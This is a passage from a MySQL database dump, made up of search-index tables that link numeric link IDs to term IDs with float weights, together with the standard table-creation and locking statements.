34288,1.23669),(113,34289,0.95669),(113,34290,0.91),(113,34291,0.98),(113,34292,0.91),(113,34293,0.98),(113,34294,0.95669),(113,34295,1.05),(118,34296,0.37338),(128,34296,2.42697),(113,34296,3.92049),(113,34297,0.88669),(113,34298,0.95669),(113,34299,0.93331),(113,34300,1.02669),(128,34301,0.98),(113,34301,2.94),(113,34302,1.14331),(113,34303,1.14331),(113,34304,1.05),(113,34305,0.95669),(113,34306,1.19),(113,34307,0.91),(128,34307,1.82),(113,34308,1.05),(128,34308,2.1),(113,34309,1.05),(113,34310,1.19),(128,34311,7.46648),(113,34311,9.3331),(128,34312,8.77352),(113,34312,10.9669),(113,34313,0.98),(113,34314,1.28331),(113,34315,0.93331),(113,34316,1.07331),(113,34317,0.98),(113,34318,1.07331),(113,34319,0.37331),(113,34320,0.98),(113,34321,1.12),(113,34322,0.28),(113,34323,0.91),(113,34324,1.02669),(113,34325,0.32669),(113,34326,1.00331),(113,34327,1.16669),(113,34328,0.86331),(113,34329,0.95669),(113,34330,0.88669),(113,34331,1.02669),(114,35579,0.88669),(114,35580,0.95669),(114,35581,0.91),(114,35582,1.00331),(114,35583,0.86331),(114,35584,1.07331),(114,35585,0.60669),(114,35586,1.14331),(114,35587,1.35331),(114,35588,0.28),(114,35589,1.05),(114,35590,1.09669),(114,35591,0.37331),(114,35592,1.16669),(114,35593,1.23669),(114,35594,0.18669),(114,35595,0.91),(114,35596,1.05),(114,35597,1.12),(114,35598,1.16669),(114,35599,0.18669),(114,35600,0.84),(114,35601,0.93331),(114,35602,1.00331),(114,35603,1.14331),(114,35604,1.02669),(114,35605,1.07331),(114,35606,0.65338),(114,35607,1.12),(114,35608,1.19),(114,35609,1.00331),(114,35610,1.21331),(114,35611,0.51331),(114,35612,1.14331),(114,35613,1.21331),(118,36453,0.18669),(118,36463,0.23331),(120,36463,0.23331),(118,36468,0.88669),(120,36472,0.86331),(116,37337,0.91),(116,37338,1.16669),(116,37339,1.07331),(116,37340,1.16669),(116,37341,0.42),(116,37342,0.98),(116,37343,1.07331),(116,37344,0.91),(116,37345,1.00331),(116,37346,1.05),(116,37347,1.00331),(116,37348,1.19),(116,37349,1.21331),(116,37350,0.91),(116,37351,1.00331),(116,37352,1.02669),(117,38395,0.84),(119,38395,0.84),(117,38396,1.00331),(117,38397,0.23331),(117,38398,0.91),(117,38399,1.02669),(117,38400,0.91),(117,38401,1.02669),(117,38402,0.28),(117,38403,0.91),(117,38404,1.19),(117,38405,0.28),(117,38406,1.00331),(117,38407,1.21331),(117,38408,0.28),(117,38409,0.91),(117,38410,1.02669),(117,38411,0.93331),(117,38412,1.02669),(117,38413,0.86331),(117,38414,0.95669),(117,38415,0.93331),(117,38416,0.88669),(117,38417,0.93331),(117,38418,0.37331),(117,38419,1.07331),(117,38420,1.14331),(117,38421,0.86331),(117,38422,0.95669),(117,38423,0.69993),(117,38424,0.93331),(117,38425,1.02669),(117,38426,1.77338),(117,38427,1.96),(117,38428,0.23331),(117,38429,0.98),(117,38430,1.05),(117,38431,0.88669),(117,38432,1.00331),(117,38433,0.93331),(117,38434,1.02669),(117,38435,0.93331),(117,38436,1.07331),(117,38437,0.7),(117,38438,1.14331),(117,38439,1.26),(117,38440,0.14),(117,38441,0.88669),(117,38442,1.02669),(117,38443,0.95669),(117,38444,1.09669),(117,38445,0.95669),(117,38446,1.07331),(117,38447,1.02669),(117,38448,1.21331),(117,38449,0.98),(117,38450,1.07331),(117,38451,0.86331),(117,38452,0.93331),(118,39453,0.14),(118,39454,0.91),(118,39455,1.05),(118,39456,1.00331),(118,39457,1.07331),(118,39458,0.91),(118,39459,1.02669),(118,39460,0.95669),(118,39461,1.09669),(118,39462,0.60669),(118,39463,1.09669),(118,39464,1.19),(118,39465,0.91),(118,39466,0.98),(118,39467,0.28),(118,39468,1.02669),(118,39469,1.14331),(118,39470,0.23331),(118,39471,0.95669),(118,39472,1.14331),(118,39473,1.02669),(118,39474,1.12),(118,39475,0.91),(118,39476,1.16669),(118,39477,0.95669),(118,39478,1.05),(118,39479,1.86662),(118,39480,2.28662),(118,39481,4.9),(118,39482,1.07331),(118,39483,1.09669),(118,39484,1.05),(118,39485,1.09669),(118,39486,1.16669),(118,39487,0.18669),(118,39488,0.91),(118,39489,1.07331),(118,39490,0.93331),(118,39491,1.00331),(118,39492,1.12),(118,39493,0.95669),(118,39494,1.05),(119,40517,0.93331),(119,40518,0.86331),(119,40519,0.93331),(119,40520,0.86331),(119,40521,1.07331),(119,40522,0.23331),(119,40523,1.02669),(119,40524,1.12),(119,40525,0.32669),(119,40526,0.98),(119,40527,1.02669),(119,40528,0.98),(119,40529,0.93331),(119,40530,1.05),(119,40531,0.84),(119,40532,1.02669),(119,40533,0.84),(119,40534,0.93331),(119,40535,0.23331),(119,40536,0.95669),(119,40537,1.05),(119,40538,0.91),(119,40539,1.00331),(119,40540,1.05),(119,40541,1.19),(119,40542,0.28),(120,40542,0.28),(126,40542,0.28),(119,40543,0.95669),(119,40544,1.05),(119,40545,0.23331),(119,40546,0.95669),(119,40547,1.14331),(120,42165,0.42),(120,42166,1.09669),(120,42167,1.19),(120,42168,0.91),(120,42169,0.95669),(120,42170,1.02669),(120,42171,1.09669),(120,42172,0.98),(120,42173,1.05),(120,42174,0.95669),(120,42175,1.05),(120,42176,0.98),(120,42177,1.05),(120,42178,1.00331),(120,42179,1.12),(120,42180,0.91),(120,42181,1.07331),(120,42182,0.95669),(120,42183,1.02669),(120,42184,0.93331),(120,42185,0.98),(120,42186,0.93331),(120,42187,1.05),(120,42188,1.07331),(120,42189,1.19),(120,42190,0.93331),(120,42191,1.21331),(120,42192,1.02669),(120,42193,1.09669),(120,42194,1.02669),(120,42195,1.14331),(120,42196,0.91),(120,42197,1.07331),(120,42198,2.52),(120,42199,1.00331),(120,42200,1.19),(120,42201,1.14331),(120,42202,1.28331),(120,42203,1.02669),(120,42204,1.12),(120,42205,1.02669),(120,42206,1.09669),(120,42207,1.02669),(120,42208,1.09669),(120,42209,1.12),(120,42210,1.16669),(120,42211,0.51331),(120,42212,1.21331),(120,42213,1.4),(120,42214,0.18669),(120,42215,1.02669),(120,42216,1.12),(120,42217,0.65338),(120,42218,1.02669),(120,42219,1.14331),(120,42220,0.95669),(120,42221,1.09669),(120,42222,1.09669),(120,42223,0.98),(120,42224,1.05),(120,42225,1.02669),(120,42226,1.14331),(120,42227,0.37331),(120,42228,1.00331),(120,42229,1.19),(120,42230,1.00331),(120,42231,1.07331),(120,42232,0.91),(120,42233,0.98),(120,42234,1.02669),(120,42235,1.28331),(120,42236,1.07331),(120,42237,1.19),(120,42238,0.88669),(120,42239,1.07331),(120,42240,0.93331),(120,42241,1.02669),(120,42242,0.28),(120,42243,0.91),(120,42244,1.02669),(120,42245,0.23331),(120,42246,0.95669),(120,42247,1.02669),(120,42248,0.28),(120,42249,0.93331),(120,42250,1.12),(120,42251,0.09331),(120,42252,0.91),(120,42253,1.02669),(120,42254,0.95669),(120,42255,1.07331),(121,43167,0.98),(121,43168,1.02669),(121,43169,0.98),(121,43170,1.05),(121,43269,0.98),(121,43270,1.05),(121,43271,0.7),(121,43272,1.37669),(121,43273,1.4),(121,43274,1.12),(121,43275,1.28331),(121,43276,0.32669),(121,43277,1.02669),(121,43278,1.26),(121,43279,0.18669),(121,43280,1.09669),(121,43281,1.19),(121,43282,0.98),(121,43283,1.07331),(121,43284,0.7),(121,43285,1.26),(121,43286,1.4),(121,43287,0.56),(121,43288,1.05),(121,43289,1.16669),(123,45004,2.24),(123,45005,2.66),(123,45006,0.23331),(123,45007,0.93331),(123,45008,1.05),(123,45009,1.09669),(123,45010,1.19),(123,45011,0.93331),(123,45012,1.05),(123,45013,0.23331),(126,45013,0.23331),(123,45014,0.88669),(123,45015,1.00331),(123,45016,0.37331),(123,45017,0.95669),(123,45018,1.14331),(123,45019,0.95669),(123,45020,1.07331),(123,45021,0.84),(123,45022,0.95669),(123,45023,0.42),(123,45024,0.98),(123,45025,1.21331),(123,45026,0.37331),(123,45027,1.00331),(123,45028,1.09669),(123,45029,0.23331),(123,45030,1.00331),(123,45031,1.07331),(123,45032,1.05),(123,45033,1.4),(123,45034,1.12),(123,45035,1.35331),(123,45036,0.18669),(128,45036,0.18669),(123,45037,0.91),(123,45038,1.05),(123,45039,0.93331),(126,45039,0.93331),(123,45040,1.05),(123,45041,1.05),(123,45042,1.23669),(123,45043,0.28),(123,45044,1.00331),(123,45045,1.07331),(123,45046,0.98),(123,45047,1.16669),(123,45048,0.88669),(123,45049,1.02669),(123,45050,1.05),(123,45051,1.23669),(123,45052,1.00331),(123,45053,1.12),(123,45054,0.91),(123,45055,1.00331),(128,46416,0.91),(125,46434,0.28),(125,47828,0.93331),(125,47829,1.02669),(125,47830,0.28),(125,47831,1.00331),(125,47832,1.07331),(125,47833,1.12),(125,47834,1.26),(125,47835,0.95669),(125,47836,1.05),(125,47837,1.02669),(125,47838,1.09669),(125,47839,0.84),(125,47840,1.07331),(125,47841,1.19),(125,47842,0.91),(125,47843,0.98),(125,47844,0.93331),(125,47845,1.05),(125,47846,0.28),(125,47847,0.91),(125,47848,1.00331),(125,47849,0.93331),(125,47850,0.98),(125,47851,0.37331),(125,47852,1.23669),(125,47853,1.35331),(125,47854,0.93331),(125,47855,0.98),(125,47856,1.00331),(125,47857,1.12),(125,47858,0.88669),(125,47859,0.98),(125,47860,0.56),(125,47861,1.07331),(125,47862,0.91),(125,47863,1.00331),(125,47864,0.28),(125,47865,0.91),(125,47866,1.00331),(125,47867,0.95669),(125,47868,1.07331),(125,47869,1.05),(125,47870,1.23669),(126,48809,1.00331),(126,48810,1.07331),(126,48811,0.91),(126,48812,0.95669),(126,48813,0.88669),(126,48814,1.05),(126,48815,0.88669),(126,48816,1.00331),(126,48817,0.37331),(126,48818,1.00331),(126,48819,1.07331),(126,48820,0.84),(126,48821,0.98),(126,48822,0.28),(126,48823,0.86331),(126,48824,0.98),(126,48825,0.84),(126,48826,0.93331),(126,48827,0.32669),(126,48828,1.00331),(126,48829,1.09669),(126,48830,0.84),(126,48831,1.00331),(126,48832,1.21331),(126,48833,1.09669),(126,48834,1.37669),(126,48835,0.14),(126,48836,0.84),(126,48837,1.07331),(126,48838,0.28),(133,48838,0.28),(126,48839,0.93331),(126,48840,1.05),(126,48841,1.14331),(126,48842,0.93331),(126,48843,1.00331),(126,48844,0.32669),(126,48845,0.98),(126,48846,1.14331),(126,48847,0.95669),(126,48848,1.05),(126,48849,0.98),(126,48850,1.26),(126,48851,0.46662),(126,48852,0.95669),(126,48853,1.05),(126,48854,0.93331),(126,48855,1.00331),(126,48856,1.02669),(126,48857,1.16669),(128,50353,0.14),(128,51491,1.26),(128,51492,1.35331),(128,51493,1.00331),(128,51494,1.12),(128,51495,1.07331),(128,51496,1.26),(128,51497,1.05),(128,51498,0.91),(128,51499,1.00331),(128,51500,0.93331),(128,51501,1.07331),(128,51502,0.28),(128,51503,1.00331),(128,51504,1.14331),(128,51505,0.93331),(128,51506,1.09669),(128,51507,0.84),(128,51508,0.91),(128,51509,0.98),(128,51510,1.09669),(128,51511,1.16669),(128,51512,0.98),(128,51513,0.95669),(128,51514,1.16669),(128,51515,0.88669),(128,51516,1.05),(128,51517,0.86331),(128,51518,0.95669),(128,51519,0.86331),(128,51520,1.12),(128,51521,0.95669),(128,51522,0.88669),(128,51523,0.93331),(128,51524,0.93331),(128,51525,1.09669),(128,51526,1.19),(128,51527,0.98),(128,51528,1.09669),(128,51529,0.95669),(128,51530,1.02669),(128,51531,0.91),(128,51532,1.07331),(128,51533,1.05),(128,51534,1.12),(128,51535,0.32669),(128,51536,0.98),(128,51537,1.12),(128,51538,1.72662),(128,51539,2.38),(128,51540,0.32669),(128,51541,0.95669),(128,51542,1.05),(128,51543,0.98),(128,51544,1.19),(133,52473,1.19),(133,52474,1.26),(133,52475,1.05),(133,52476,1.26),(133,52477,1.02669),(133,52478,1.30669),(133,52479,2.28662),(133,52480,1.23669),(133,52481,1.37669),(133,52482,0.95669),(133,52483,1.07331),(134,52676,0.93331),(134,52677,1.19),(134,52678,1.07331),(134,52679,1.16669),(134,52680,0.88669),(134,52681,1.12),(134,52682,0.37331),(134,52683,0.98),(134,52684,1.05),(134,52685,0.28),(134,52686,0.98),(134,52687,1.19); /*!40000 ALTER TABLE `fit_finder_links_terms6` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_links_terms7` -- DROP TABLE IF EXISTS `fit_finder_links_terms7`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_links_terms7` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_links_terms7` -- LOCK TABLES `fit_finder_links_terms7` WRITE; /*!40000 ALTER TABLE `fit_finder_links_terms7` DISABLE KEYS */; INSERT INTO `fit_finder_links_terms7` VALUES (2,31,0.5334),(110,31,1.12014),(111,36,0.09331),(112,36,0.09331),(113,36,0.09331),(121,36,0.09331),(2,36,0.22661),(35,36,0.49321),(2,37,2.09661),(2,38,2.21),(3,199,0.28),(3,200,1.07331),(3,201,1.21331),(3,202,0.93331),(3,203,1.09669),(3,204,0.18669),(3,205,1.07331),(3,206,1.14331),(3,207,0.23331),(3,208,1.05),(3,209,1.26),(3,210,0.18669),(3,211,0.86331),(3,212,1.02669),(3,238,0.37338),(3,239,0.98),(3,240,1.12),(3,241,0.91),(3,242,1.21331),(3,243,0.32669),(3,244,1.02669),(3,245,1.19),(9,303,0.03996),(128,303,0.03996),(3,303,0.07992),(5,303,0.07992),(20,303,0.07992),(21,303,0.07992),(22,303,0.07992),(23,303,0.07992),(24,303,0.07992),(25,303,0.07992),(35,303,0.07992),(52,303,0.07992),(55,303,0.07992),(58,303,0.07992),(77,303,0.07992),(103,303,0.07992),(104,303,0.07992),(105,303,0.07992),(106,303,0.07992),(107,303,0.07992),(109,303,0.07992),(110,303,0.07992),(111,303,0.07992),(112,303,0.07992),(113,303,0.07992),(114,303,0.07992),(116,303,0.07992),(117,303,0.07992),(118,303,0.07992),(119,303,0.07992),(120,303,0.07992),(121,303,0.07992),(123,303,0.07992),(125,303,0.07992),(126,303,0.07992),(129,303,0.07992),(130,303,0.07992),(133,303,0.07992),(134,303,0.07992),(40,303,0.10323),(68,303,0.10323),(3,304,0.27993),(3,305,0.93331),(3,306,1.07331),(3,307,0.95669),(3,308,1.12),(3,309,0.91),(3,310,1.05),(9,568,0.28),(9,569,0.93331),(9,570,1.14331),(109,3046,0.28),(111,3046,0.28),(118,3046,0.28),(121,3046,0.28),(112,3046,0.56),(22,3046,0.96),(35,3050,0.14),(23,3050,0.24),(24,3050,0.24),(25,3050,0.24),(77,3050,0.24),(103,3050,0.24),(104,3050,0.24),(105,3050,0.24),(106,3050,0.24),(107,3050,0.24),(109,3050,0.24),(110,3050,0.24),(111,3050,0.24),(112,3050,0.24),(114,3050,0.24),(134,3050,0.24),(119,3069,0.37331),(123,3069,0.37331),(107,3069,0.74662),(25,3069,1.27992),(25,3070,3.43992),(25,3071,3.67992),(35,9630,0.28),(35,9631,0.98),(35,9632,1.12),(35,9633,0.23331),(105,9633,0.23331),(113,9633,0.23331),(35,9634,0.88669),(35,9635,1.00331),(134,9730,0.23331),(35,9730,0.46662),(35,9731,0.95669),(35,9732,1.05),(35,9733,0.98),(35,9734,1.07331),(35,9909,0.86331),(35,9910,1.02669),(110,10674,0.32669),(113,10674,0.32669),(118,10674,0.65338),(40,10916,1.00331),(40,10917,1.12),(58,11782,0.0175),(103,11782,0.0175),(104,11782,0.0175),(105,11782,0.0175),(110,11782,0.0175),(112,11782,0.0175),(116,11782,0.0175),(117,11782,0.0175),(119,11782,0.0175),(120,11782,0.0175),(126,11782,0.0175),(118,11782,0.035),(107,11782,0.07),(58,11783,0.93331),(58,11784,1.07331),(113,11785,0.28),(58,11785,0.56),(58,11786,1.12),(58,11787,1.28331),(52,12234,0.23331),(52,12235,0.95669),(52,12236,1.09669),(58,12637,1.07331),(58,12638,1.16669),(110,12834,0.14),(134,12834,0.14),(68,13571,0.18669),(103,13571,0.18669),(107,13571,0.18669),(113,13571,0.18669),(119,13571,0.18669),(120,13571,0.18669),(125,13571,0.18669),(68,13572,0.86331),(103,13572,0.86331),(107,13572,0.86331),(119,13572,0.86331),(125,13572,0.86331),(68,13573,1.05),(68,13574,0.01169),(104,13574,0.01169),(105,13574,0.01169),(113,13574,0.01169),(117,13574,0.01169),(118,13574,0.01169),(121,13574,0.01169),(125,13574,0.02338),(110,13574,0.04676),(68,13575,0.88669),(125,13575,0.88669),(68,13576,1.14331),(68,13678,0.28),(103,13678,0.28),(68,13679,1.00331),(68,13680,1.05),(68,13681,0.98),(68,13682,1.07331),(119,14143,0.28),(120,14143,0.28),(128,14143,0.28),(110,14146,0.84),(112,14149,0.32669),(112,14150,0.93331),(105,14314,0.04669),(111,14314,0.04669),(134,14314,0.04669),(103,17145,0.28),(111,17145,0.28),(107,17145,0.56),(103,17146,1.00331),(103,17147,1.33),(103,17148,0.42),(103,17149,1.02669),(103,17150,1.14331),(103,17151,0.28),(103,17152,0.93331),(103,17153,1.02669),(103,17154,0.56),(103,17155,0.93331),(103,17156,1.23669),(103,17157,1.02669),(103,17158,1.12),(103,17159,1.02669),(103,17160,0.32669),(103,17161,0.95669),(103,17162,1.05),(103,17163,0.23331),(112,17163,0.23331),(120,17163,0.23331),(103,17164,0.93331),(103,17165,1.09669),(103,17166,0.88669),(104,17166,0.88669),(118,17166,0.88669),(103,17167,1.02669),(103,17168,0.56007),(103,17169,1.02669),(103,17170,1.23669),(103,17171,0.88669),(103,17172,1.05),(103,17173,0.98),(103,17174,1.05),(104,17175,0.0175),(114,17175,0.0175),(111,17175,0.035),(112,17175,0.035),(118,17175,0.035),(120,17175,0.035),(126,17175,0.035),(105,17175,0.0525),(106,17175,0.0525),(113,17175,0.0525),(119,17175,0.0875),(117,17175,0.1225),(103,17175,0.1575),(110,17175,0.42),(106,17176,0.81669),(110,17176,0.81669),(103,17176,1.63338),(103,17177,0.93331),(103,17178,0.98),(103,17179,0.95669),(103,17180,1.14331),(103,17181,0.88669),(103,17182,1.00331),(103,17183,0.88669),(103,17184,1.05),(103,17185,0.91),(103,17186,1.02669),(103,17187,0.84),(103,17188,1.00331),(103,17189,0.88669),(103,17190,1.00331),(103,17191,0.88669),(103,17192,1.05),(103,17193,0.28),(120,17193,0.28),(110,17193,0.84),(103,17194,0.93331),(103,17195,1.05),(103,17196,0.32669),(112,17196,0.32669),(103,17197,0.95669),(103,17198,1.07331),(103,17199,0.14),(112,17199,0.14),(118,17199,0.14),(120,17199,0.14),(125,17199,0.14),(128,17199,0.14),(107,17199,0.28),(110,17199,0.28),(113,17199,0.28),(117,17199,0.28),(103,17200,0.88669),(103,17201,0.98),(103,17202,0.28),(103,17203,0.86331),(103,17204,0.95669),(103,17205,0.84),(103,17206,1.07331),(103,17207,0.09331),(103,17208,0.98),(103,17209,1.16669),(103,17444,0.32669),(113,17444,0.32669),(117,17444,0.32669),(103,17445,0.95669),(103,17446,1.12),(103,17981,0.46669),(103,17982,1.16669),(103,17983,1.23669),(103,17984,0.32669),(103,17985,1.00331),(103,17986,1.07331),(106,17987,0.01169),(113,17987,0.01169),(123,17987,0.01169),(112,17987,0.02338),(117,17987,0.02338),(120,17987,0.02338),(125,17987,0.02338),(128,17987,0.02338),(105,17987,0.04676),(103,17987,0.07014),(103,17988,0.84),(105,17988,0.84),(103,17989,0.95669),(103,17990,0.88669),(103,17991,1.02669),(103,17992,0.95669),(103,17993,1.26),(103,17994,0.84),(113,17994,0.84),(103,17995,0.95669),(103,17996,0.86331),(103,17997,0.95669),(103,17998,0.86331),(103,17999,0.91),(103,18000,0.32669),(106,18000,0.32669),(103,18001,0.95669),(103,18002,1.05),(103,18003,0.37331),(103,18004,0.98),(103,18005,1.09669),(103,18006,0.95669),(103,18007,1.16669),(103,18008,0.14),(111,18008,0.14),(112,18008,0.14),(121,18008,0.28),(103,18009,0.91),(103,18010,0.98),(116,18011,0.0175),(117,18011,0.0175),(119,18011,0.0175),(103,18011,0.035),(113,18011,0.035),(120,18011,0.035),(128,18011,0.035),(110,18011,0.1575),(103,18012,0.84),(113,18012,0.84),(110,18012,2.52),(103,18013,0.93331),(103,18014,0.84),(117,18014,0.84),(103,18015,0.93331),(103,18016,0.18669),(104,18016,0.18669),(110,18016,0.18669),(117,18016,0.18669),(103,18017,0.88669),(103,18018,1.02669),(104,18818,1.05),(104,18819,0.42),(104,18820,1.82),(104,18821,1.00331),(104,18822,0.98),(104,18823,0.84),(104,18824,0.98),(104,18825,0.86331),(126,18825,0.86331),(104,18826,1.05),(104,18939,0.51331),(104,18940,1.23669),(104,18941,1.35331),(104,18942,0.37331),(110,18942,0.37331),(104,18943,0.95669),(104,18944,1.02669),(104,19225,0.09331),(106,19225,0.09331),(110,19225,0.09331),(112,19225,0.09331),(117,19225,0.09331),(120,19225,0.09331),(105,19225,0.27993),(104,19226,0.91),(104,19227,1.05),(104,19228,0.37331),(112,19228,0.37331),(104,19229,0.98),(104,19230,1.12),(104,19231,0.18669),(110,19231,0.18669),(113,19231,0.18669),(119,19231,0.18669),(120,19231,0.18669),(123,19231,0.18669),(128,19231,0.18669),(117,19231,0.37338),(104,19232,0.88669),(104,19233,1.02669),(104,19234,0.86331),(104,19235,0.95669),(113,19236,0.32669),(125,19236,0.32669),(104,19236,0.65338),(104,19237,1.07331),(104,19238,1.21331),(104,19239,1.00331),(104,19240,1.05),(105,20150,0.46662),(105,20151,0.98),(105,20152,1.09669),(105,20153,0.88669),(105,20154,1.14331),(105,20155,0.23331),(105,20156,0.98),(105,20157,1.14331),(105,20158,0.23331),(118,20158,0.23331),(120,20158,0.23331),(105,20159,0.93331),(105,20160,1.07331),(105,20161,0.91),(105,20162,1.00331),(105,20163,1.05),(105,20164,1.09669),(112,20165,0.23331),(118,20165,0.23331),(126,20165,0.23331),(105,20165,0.46662),(105,20166,0.98),(105,20167,1.05),(105,20168,0.93331),(105,20169,1.00331),(105,20170,1.00331),(105,20171,1.07331),(105,20172,0.18669),(105,20173,0.88669),(105,20174,1.02669),(105,20175,0.37331),(105,20176,0.98),(105,20177,1.05),(105,20178,0.18669),(105,20179,0.86331),(105,20180,1.02669),(105,20181,0.91),(105,20182,1.00331),(105,20183,0.88669),(112,20183,0.88669),(105,20184,0.98),(105,20185,0.84),(117,20185,0.84),(105,20186,0.93331),(105,20304,0.23331),(105,20305,0.86331),(105,20306,1.00331),(105,20628,0.77),(134,20628,0.77),(105,20629,0.84),(105,20630,0.86331),(105,20631,0.95669),(105,20632,0.91),(105,20633,1.07331),(105,20634,0.81669),(105,20635,0.91),(105,20636,0.37331),(105,20637,0.98),(105,20638,1.14331),(105,20639,0.79331),(105,20640,0.93331),(105,20641,0.93331),(105,20642,0.86331),(105,20643,1.05),(105,20644,0.86331),(105,20645,1.12),(105,20646,0.23331),(111,20646,0.23331),(119,20646,0.23331),(110,20646,0.93324),(105,20647,0.95669),(105,20648,1.09669),(105,20649,0.23331),(105,20650,0.88669),(105,20651,1.00331),(106,21559,0.28),(106,21560,0.98),(106,21561,1.16669),(106,21562,0.28),(106,21563,1.07331),(106,21564,1.16669),(106,21565,0.56007),(106,21566,2.79993),(106,21567,1.07331),(106,21568,1.05),(106,21569,1.05),(106,21570,0.98),(106,21571,0.93331),(106,21572,1.12),(106,21573,0.86331),(106,21574,1.05),(106,21575,1.16655),(106,21576,3.54676),(106,21577,1.02669),(106,21578,1.02669),(106,21579,0.98),(106,21580,1.14331),(106,21581,0.91),(106,21582,1.05),(106,22030,0.91),(106,22031,1.05),(106,22032,0.86331),(106,22033,0.93331),(106,22034,0.98),(106,22035,1.16669),(107,22686,0.18662),(107,22687,1.72662),(107,22688,1.96),(107,22689,1.12),(107,22690,0.93331),(107,22691,1.02669),(107,22692,1.00331),(107,22693,1.16669),(107,22694,1.82),(107,22695,2.19338),(107,22696,2.05338),(107,22697,2.24),(107,22698,2.28662),(107,22699,2.70662),(107,22700,1.12),(107,22701,0.98),(107,22702,1.05),(107,22703,1.77338),(107,22704,1.91338),(107,22705,0.95669),(107,22706,1.07331),(107,22707,1.82),(107,22708,1.96),(107,22797,0.28),(112,22797,0.28),(107,22798,1.00331),(112,22798,1.00331),(107,22799,1.21331),(107,22993,0.93338),(107,22994,1.09669),(107,22995,1.19),(107,22996,1.02669),(107,22997,1.14331),(107,22998,0.46669),(107,22999,1.02669),(107,23000,1.19),(107,23001,0.42),(110,23001,0.42),(107,23002,1.05),(107,23003,1.21331),(117,23772,0.18669),(119,24196,0.81669),(110,24198,0.88669),(110,24202,0.91),(119,24202,0.91),(109,24784,0.32669),(111,24784,0.32669),(121,24784,0.32669),(109,24785,0.98),(109,24786,1.26),(109,24787,0.23331),(109,24788,1.09669),(109,24789,1.26),(109,24790,2.80035),(109,24791,0.86331),(109,24792,1.05),(109,24793,0.88669),(109,24794,1.14331),(109,24795,0.88669),(109,24796,1.14331),(109,24797,0.95669),(109,24798,1.09669),(109,24799,2.52),(109,24800,2.00662),(109,24801,0.93331),(109,24802,0.95669),(109,24803,1.09669),(109,24804,0.88669),(109,24805,0.95669),(109,24806,1.26),(109,24807,1.4),(109,24808,1.77338),(109,24809,2.19338),(109,24810,0.86331),(109,24811,1.02669),(109,24812,0.91),(109,24813,1.09669),(109,24814,0.98),(109,24815,1.02669),(109,24816,0.14),(110,24816,0.14),(113,24816,0.14),(120,24816,0.14),(121,24816,0.14),(125,24816,0.14),(128,24816,0.14),(114,24816,0.28),(111,24816,0.56),(109,24817,0.81669),(121,24817,0.81669),(109,24818,0.88669),(111,24819,0.23331),(109,24819,0.93324),(109,24820,1.07331),(109,24821,1.23669),(109,24822,1.91338),(109,24823,2.28662),(109,24824,1.02669),(109,24825,1.14331),(109,24826,0.23331),(111,24826,0.23331),(109,24827,1.02669),(109,24828,1.14331),(109,24829,0.23331),(109,24830,1.00331),(109,24831,1.19),(109,24832,0.65331),(109,24833,1.16669),(109,24834,1.37669),(109,24896,0.28),(114,24896,0.28),(111,24896,0.56),(109,24897,0.98),(109,24898,1.09669),(109,25027,0.60669),(109,25028,1.05),(109,25029,1.26),(121,25030,0.14),(109,25030,0.56),(114,25030,0.7),(111,25030,1.54),(109,25031,1.02669),(109,25032,1.23669),(109,25033,0.95669),(109,25034,1.02669),(109,25035,0.91),(111,25035,0.91),(109,25036,1.16669),(109,25037,0.93331),(109,25038,1.19),(109,25039,1.02669),(111,25039,1.02669),(121,25039,1.02669),(109,25040,1.14331),(110,27369,0.91),(110,27370,1.05),(110,27371,0.86331),(110,27372,0.93331),(110,27373,0.98),(110,27374,1.19),(110,27375,1.86662),(110,27376,2.00662),(110,27377,0.91),(110,27378,0.98),(110,27379,0.32669),(110,27380,0.98),(110,27381,1.07331),(110,27382,0.95669),(110,27383,1.14331),(110,27384,0.46669),(110,27385,1.14331),(110,27386,1.21331),(110,27387,1.00331),(110,27388,1.16669),(110,27389,0.88669),(110,27390,1.00331),(110,27391,0.91),(117,27391,0.91),(110,27392,1.05),(110,27393,1.14331),(110,27394,1.23669),(110,27395,0.86331),(110,27396,0.95669),(110,27397,1.02669),(110,27398,1.09669),(110,27399,0.46669),(110,27400,1.23669),(110,27401,1.30669),(110,27402,0.60669),(110,27403,1.12),(110,27404,1.21331),(110,27405,0.28),(110,27406,0.86331),(110,27407,0.93331),(110,27408,0.84),(110,27409,0.91),(110,27410,1.00331),(110,27411,0.98),(110,27412,1.05),(110,27413,1.02669),(110,27414,1.12),(110,27415,1.68),(110,27416,1.14331),(110,27417,1.05),(110,27418,1.86662),(110,27419,2.1),(110,27420,1.96),(110,27421,1.05),(110,27422,1.05),(110,27423,0.88669),(110,27424,0.98),(110,27425,0.95669),(110,27426,1.07331),(110,27427,1.91338),(110,27428,2.05338),(110,27429,1.68),(110,27430,1.77338),(110,27431,0.98),(110,27432,1.05),(110,27433,1.00331),(110,27434,1.28331),(110,27435,2.05338),(110,27436,2.19338),(110,27437,1.05),(110,27438,1.23669),(110,27439,1.07331),(110,27440,1.23669),(110,27441,0.88669),(110,27442,0.95669),(110,27443,0.91),(110,27444,1.14331),(110,27445,0.88669),(110,27446,1.09669),(110,27447,0.84),(110,27448,2.00662),(110,27449,2.19338),(110,27450,0.37338),(110,27451,1.72662),(110,27452,1.05),(110,27453,1.07331),(110,27454,0.88669),(110,27455,1.00331),(110,27456,1.05),(110,27457,1.21331),(110,27458,0.91),(110,27459,1.00331),(110,27460,1.12),(110,27461,1.05),(110,27462,1.28331),(110,27463,1.14331),(110,27464,1.26),(110,27465,0.37331),(110,27466,0.95669),(110,27467,1.00331),(110,27468,0.28),(110,27469,1.02669),(110,27470,1.09669),(110,27471,1.82),(110,27472,1.96),(110,27473,1.86662),(110,27474,2.14662),(110,27475,0.91),(110,27476,1.02669),(117,27477,0.14),(110,27477,0.28),(110,27478,1.00331),(110,27479,1.12),(110,27480,0.86331),(110,27481,1.05),(110,28221,0.65331),(110,28222,1.21331),(110,28223,1.4),(110,28224,1.00331),(110,28225,1.07331),(110,28226,0.28),(110,28227,0.93331),(110,28228,1.02669),(110,28229,1.19),(110,28230,1.26),(110,28231,0.42),(110,28232,1.16669),(110,28233,1.26),(110,29231,0.86331),(110,29232,0.95669),(110,29233,0.32669),(110,29234,0.91),(110,29235,1.02669),(110,29236,0.42),(110,29237,1.00331),(110,29238,